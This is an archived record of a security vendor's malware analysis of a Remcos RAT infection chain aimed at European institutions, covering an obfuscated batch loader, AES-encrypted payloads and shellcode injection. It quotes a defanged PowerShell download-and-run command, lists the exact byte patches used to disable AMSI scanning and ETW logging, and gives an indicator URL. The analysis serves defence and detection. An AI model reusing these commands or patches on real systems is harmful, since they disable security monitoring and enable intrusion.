{
	"id": "2997632b-9a40-46c1-8e0d-88f15adc2426",
	"created_at": "2026-04-06T00:08:19.676874Z",
	"updated_at": "2026-04-10T03:21:32.180471Z",
	"deleted_at": null,
	"sha1_hash": "613c238d902fdde519901a71eb5d7e35f2e09619",
	"title": "Remcos RAT Targets Europe: New AMSI and ETW Evasion Tactics Uncovered",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1291814,
	"plain_text": "Remcos RAT Targets Europe: New AMSI and ETW Evasion\r\nTactics Uncovered\r\nPublished: 2025-02-21 · Archived: 2026-04-05 14:34:42 UTC\r\nThis week, the SonicWall threat research team discovered a new update in the Remcos infection chain aimed at\r\nenhancing its stealth by patching AMSI scanning and ETW logging to evade detection.\r\nThis loader was seen distributing Async RAT in the past, but it has now extended its functionality to Remcos RAT\r\nand other malware families. From our analysis, it seems to be targeting European institutions.\r\nInfection Chain\r\nFigure 1: Infection chain\r\nThe initial infection is executed through a VB script embedded within an archive file. On execution, the VB script\r\ncreates a randomly named batch script in the user’s temporary folder. This batch script is extensively obfuscated and\r\nis executed in a minimized window state without leaving any visible trace or output on the console. It creates a\r\nself-copy at “%userprofile%\\dwm.bat”. The bulk of the batch content is obfuscated by dividing it into several\r\nstrings assigned to different variables, which are later concatenated.\r\nhttps://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered\r\nPage 1 of 8\r\nFigure 2: Obfuscated Batch File\r\nThe concatenated strings from the obfuscated data create a Base64-encoded command that is executed via\r\nPowerShell. The PowerShell initially downloads and executes an AMSI-bypassing PowerShell script using the command\r\n“iwr -UseBasicParsing \"hxxps://0x0[.]st/8KuV.ps1\"”. We will discuss this further below. The command is passed with\r\nthe parameter -ErrorAction SilentlyContinue to avoid displaying any errors.\r\nNext, it decodes and decrypts the encoded data from the batch file. It retrieves dwm.bat from the %user%\r\ndirectory, then checks for the presence of “::” in the lines of the batch file. A line containing “::” has encoded\r\ndata appended to the symbol.\r\nFigure 3: PowerShell Decoding data\r\nThe two Base64 data segments are then split using the delimiter “\\” with the .Split(‘\\’) method. Both data segments\r\nare initially decoded from Base64 to ASCII. Once decoded, they are decrypted using AES in CBC mode.\r\nFigure 4: AES Decrypt\r\nThe decrypted data is then decompressed using Gzip decompression. The retrieved MSIL assembly is executed\r\nusing the PowerShell Invoke function.\r\nAMSI Bypass (PowerShell)\r\nThe Anti-Malware Scan Interface (AMSI) is a Microsoft Windows component that enables applications and\r\nservices to integrate with any antimalware product installed on a system. It is used by antimalware software to\r\nscan memory, scripts, content source URLs, and more. In particular, AMSI offers protection for PowerShell\r\nscripts, which are commonly abused by malware for smooth execution.\r\nHere, the PowerShell script downloaded from \"hxxps://0x0[.]st/8KuV.ps1\" is used to bypass AMSI to avoid\r\ndetection. Before using any AMSI function, it needs to initiate a communication channel using AmsiInitialize.\r\nFigure 5: AMSIInitialize\r\nThe authors patch the scan function with the bytes [0xb8, 0x00, 0x00, 0x00, 0x00, 0xc3]. Here the common technique of\r\nreturning the result 0x00 in register eax is used.\r\nThe return value of 0x00 indicates AMSI_RESULT_CLEAN, i.e., that no malware was detected.\r\nFigure 6: Patch AMSI Context\r\nThe patch is copied using the [System.Runtime.InteropServices.Marshal]::Copy method.\r\nFigure 7: Copy Patch Bytes\r\nPatching Event Tracing for Windows\r\nEvent Tracing for Windows (ETW) is used to log a majority of changes happening in your Windows system. To bypass\r\nETW, the attacker tries to patch the ntdll.dll function EtwEventWrite, which logs ETW events.\r\nFigure 8: ETW Patching\r\nThis patch will cause the event logger to return on every event without recording any data, preventing event-based\r\nrules from being triggered.\r\nPayload\r\nThe initial PowerShell script executes both of the decrypted MSIL assemblies. The first MSIL payload contains no\r\nassembly code; it is simply a dummy file with a size of 4KB. The second decrypted MSIL loader file continues the\r\nexecution process, advancing to the next step.\r\nInitially, it checks for the presence of a file starting with “StartupScript_{Random_string}” in the startup\r\ndirectory. In this case, the random string is an 8-character substring of a newly generated GUID. This file is a self-replica of the executing file.\r\nFigure 9: Check Startup Drop\r\nNext, the loader again patches event tracing to avoid any detection based on event logging. It patches the function\r\nEtwEventWrite with [0xC2, 0x14, 0x00] or [0xC3].\r\nFor 64-bit, the first 3 bytes will add 0x14 to esp (popping the stack before returning) and then return, whereas for 32-bit\r\nit will directly return without changing anything.\r\nFigure 10: Loader ETW patching\r\nFurther, the loader checks for the presence of a .NET resource named xxxxxxxxxxxxxxxxxxxxxxxxxxxx.exe.\r\nThis resource has encrypted data stored in it.\r\nFigure 11: Resource Check\r\nThis data is decrypted using AES decryption with a key stored in the payload itself.\r\nFigure 12: AES Decryption\r\nThe decrypted data is native shellcode; it is injected and executed in the parent process. There is a high\r\nlikelihood that the shellcode differs from one payload to another, as we have already seen various campaigns\r\ndistributed through the same infection chain.\r\nIn this sample the shellcode is Remcos RAT:\r\nFigure 13: Remcos RAT\r\nRemcos RAT is infamous for stealing various credentials, including browser data, user information and system\r\ninformation, and for keylogging. Furthermore, it can be used to control and monitor the victim’s system.\r\nFigure 14: Remcos KeyLogger\r\nAs can be seen in the above image, it copies clipboard data and key logs into the file “C:\\ProgramData\\remcos\\logs.dat”.\r\nThis threat is detected by SonicWall Capture ATP w/RTDMI.\r\nIOCs\r\nhxxps://0x0[.]st/8KuV.ps1\r\nSource: https://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://www.sonicwall.com/blog/remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered"
	],
	"report_names": [
		"remcos-rat-targets-europe-new-amsi-and-etw-evasion-tactics-uncovered"
	],
	"threat_actors": [],
	"ts_created_at": 1775434099,
	"ts_updated_at": 1775791292,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/613c238d902fdde519901a71eb5d7e35f2e09619.pdf",
		"text": "https://archive.orkl.eu/613c238d902fdde519901a71eb5d7e35f2e09619.txt",
		"img": "https://archive.orkl.eu/613c238d902fdde519901a71eb5d7e35f2e09619.jpg"
	}
}